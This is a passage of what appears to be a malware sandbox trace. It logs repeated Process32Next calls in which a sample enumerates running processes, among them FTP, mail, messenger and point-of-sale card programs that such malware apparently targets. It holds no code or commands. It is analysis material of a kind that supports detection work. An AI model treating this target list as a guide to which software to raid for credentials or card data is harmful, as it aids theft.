th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.768] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.771] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.773] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.776] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.845] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.847] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.848] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.849] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.852] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.854] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0252.858] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0252.859] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.861] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.862] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0252.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0252.865] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0252.867] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0252.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.870] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0252.873] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.875] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.876] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.878] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0252.879] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0252.881] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0252.882] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0252.883] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0252.885] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0252.924] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0252.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0252.927] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0252.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0252.930] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0252.932] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0252.936] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0252.938] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0252.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0252.941] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0252.942] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0252.944] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0252.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0252.946] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0252.951] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0252.953] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0252.954] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0252.956] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0252.957] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0252.959] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0252.961] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0252.962] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0253.014] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0253.016] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0253.018] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0253.020] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0253.022] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0253.024] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0253.025] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0253.030] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0253.032] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0253.033] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0253.035] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0253.037] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0253.039] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0253.040] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0253.045] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0253.046] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0253.048] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0253.050] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0253.052] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0253.053] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0253.055] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0253.056] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0253.095] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0253.097] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0253.098] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0253.100] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0253.101] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0253.103] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0253.107] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0253.109] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 